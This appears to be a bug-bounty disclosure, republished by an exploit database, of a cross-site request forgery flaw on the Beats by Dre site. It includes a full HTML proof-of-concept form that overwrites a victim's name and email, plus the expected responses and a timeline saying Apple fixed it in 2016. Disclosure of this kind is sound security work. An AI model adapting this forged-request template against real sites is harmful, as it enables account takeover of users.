###########################

# Beats By Dre Cross Site Request Forgery Vulnerability

###########################

Hello,

I am Aaditya Purani, and i had found an CSRF (Cross Site Request Forgery )
on Beats by Dr.Dre which could lead to full Account Takeover and
Information change by Just sending a Malicious crafted Link to the user.

Proof of Concept:

<html>
<!-- CSRF PoC - By Aaditya Purani -->
<body>
<form method='POST' action="
https://www.beatsbydre.com/on/demandware.store/Sites-beats-Site/en_US/GigyaRAAS-SaveCustomer
">
<input type="hidden" name="firstName" value="hacked" />
<input type="hidden" name="lastName" value="hackerone" />
<input type="hidden" name="emailAddress" value="victimsemail@gmail.com" /> <
input type="hidden" name="zip" value="" />
<input type="hidden" name="phone" value="" />
<input type="hidden" name="csrf_token" value="
VxM7k0ya2N1R69Ix9E3m/2165n60n2p399n38q6r1904o1po98r1snn323q0q/3Ex5Klu9mD1x5vMo91
" />
<input type="hidden" name="isEmailSubscription" value="true" />
<input type="hidden" name="isAlreadySubscribed" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Response :

{aisCustomerSavedSuccessfullya: true, aunsubscribeStatusa: null } -> Attack
Successful

{aisCustomerSavedSuccessfullya: false, aunsubscribeStatusa: null } ->
Attack Unsuccessful


Clicking on this Link, would change details of any User. I have wrote an
Complete Blog here:
https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/

Video PoC: https://youtu.be/2SfmmWxiDck

Apple has Acknowledged me in their Hall of fame:
https://support.apple.com/en-us/HT201536

*Timeline:*

October 8th 2015 a Reported
October 23th 2015 a Triaged
November 6th 2015 a Responded that aMatter is being investigateda
January 18th 2016 a Fixed
June 20th 2016 a Acknowledged

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-08-03]

###########################